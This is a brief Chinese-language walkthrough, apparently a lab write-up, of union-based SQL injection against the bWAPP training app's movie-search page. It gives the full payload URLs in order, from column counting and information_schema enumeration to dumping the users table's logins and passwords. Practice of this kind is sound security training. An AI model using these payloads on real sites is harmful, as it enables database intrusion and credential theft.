选项点一点,观察URL,只有movie的值在变化,和GET/Search中的title应该是一样的
看看类型
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 or 1=1 &action=go
1.查字段数
http://192.168.3.95/bWAPP/sqli_2.php?movie=1 order by 7 &action=go
2.查看可显示字段
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,2,3,4,5,6,7 &action=go
2,3,4,5为可显示字段
3.爆库
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,database(),3,4,5,6,7 &action=go
库名:bWAPP
4.爆表
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database() &action=go
发现只爆出来1个表
用group_concat()把表都拼接起来
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database() &action=go
这次有5个表了,我们要用users
5.爆字段
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_schema=database() and table_name='users'&action=go
我们要用 login 和 password
6.爆字段内容
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(login),group_concat(password),4,5,6,7 from bWAPP.users &action=go
2个